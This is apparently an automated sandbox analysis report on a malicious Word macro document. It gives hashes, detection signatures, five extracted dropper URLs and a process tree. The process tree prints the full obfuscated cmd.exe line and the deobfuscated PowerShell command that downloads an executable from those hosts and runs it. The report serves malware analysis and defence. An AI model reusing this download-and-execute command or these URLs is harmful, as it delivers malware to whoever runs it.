Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    11/05/2024, 11:05

General

  • Target

    3445861e718e3414725e2ee1af1b7d40_JaffaCakes118.doc

  • Size

    68KB

  • MD5

    3445861e718e3414725e2ee1af1b7d40

  • SHA1

    db660619f5abdb23490c2b60288ea93c8df4a3ad

  • SHA256

    97c417918368f2b12dd4f531d6038f0f9b30c6a902fd17d43f6873f679cf1b11

  • SHA512

    4d04836bb21d36b6afd02667119d9eb6da3c4a4c84db3a1138894a96a966412933685b38449caddfc459dfe194f6a9f2aea8162f1d2982d91b000ad5b46c942f

  • SSDEEP

    768:upJcaUitGAlmrJpmxlzC+w99NBE+1o/BbbMmBktlFAO2vxwpp:uptJlmrJpmxlRw99NBE+a/NknF

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mooremakeup.com/k

exe.dropper

http://crossroadstamp.com/0

exe.dropper

http://ntsuporte.com.br/kl5

exe.dropper

http://oooka.biz/RaQOFhRM

exe.dropper

http://parusalon.ru/idb

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3445861e718e3414725e2ee1af1b7d40_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2612
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V^:^O/C"^s^e^t ^jU^8n=^ ^ ^ ^ ^ ^ ^ ^ ^ }^}{^hc^t^ac^};^ka^erb^;FvK$^ ^m^e^t^I-^e^k^ovnI^;)^Fv^K$^ ,Jl^I$(eli^Fda^o^lnwo^D.^S^zv^${yr^t{)z^Bi$ n^i^ ^Jl^I$(hc^aer^o^f;^'^ex^e.'^+Q^Q^i$+^'^\'+c^i^lbu^p:vn^e^$^=Fv^K$^;'^68^7^' = ^QQ^i$;)'@'(tilp^S^.'^bd^i/^ur.n^ola^s^ura^p//^:^ptt^h@MRh^FO^QaR/^zi^b^.^a^ko^oo//:^ptt^h@5^l^k/rb.^m^oc.e^tro^p^u^stn//:p^tth^@0/m^oc^.^pma^t^sd^aors^sorc//^:^ptt^h@^k/^m^oc^.pue^kam^er^o^om//:ptth'^=zB^i^$^;tnei^lCbe^W^.t^eN^ ^tc^ejbo^-w^en=S^zv^$ ^l^l^e^h^sre^wop&&^f^or /^L %^x ^in (^3^40,^-^1^,^0)^d^o s^e^t ^8^h=!^8^h!!^jU^8n:~%^x,1!&&^i^f %^x ^eq^u ^0 ca^l^l %^8^h:^~^4%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $vzS=new-object Net.WebClient;$iBz='http://mooremakeup.com/k@http://crossroadstamp.com/0@http://ntsuporte.com.br/kl5@http://oooka.biz/RaQOFhRM@http://parusalon.ru/idb'.Split('@');$iQQ = '786';$KvF=$env:public+'\'+$iQQ+'.exe';foreach($IlJ in $iBz){try{$vzS.DownloadFile($IlJ, $KvF);Invoke-Item $KvF;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2508

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      5f929ceb74f9400d1089834e63dd048f

      SHA1

      0818bed63936c0c23535a58074aba31b308c6d4d

      SHA256

      9d84cef235978ca6bb607705676b28bc4998005c440f5dca9d912cd2c5d5a177

      SHA512

      23bfd629f3b93b02edcf2246aad71a96cb5f96265cade1df560a1da3cca90e987a925924c0dfaa5c80b64ec20d99c9ed2ffc058fabf9644be792aff752203595

    • memory/2180-8-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-42-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-32-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-12-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-24-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-23-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-20-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-16-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-15-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-14-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-11-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-0-0x000000002F631000-0x000000002F632000-memory.dmp

      Filesize

      4KB

    • memory/2180-2-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2180-6-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-9-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-29-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-28-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-10-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-30-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-7-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-58-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2180-41-0x000000007168D000-0x0000000071698000-memory.dmp

      Filesize

      44KB

    • memory/2180-31-0x0000000000190000-0x0000000000290000-memory.dmp

      Filesize

      1024KB

    • memory/2180-57-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2180-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2508-40-0x00000000054E0000-0x000000000553B000-memory.dmp

      Filesize

      364KB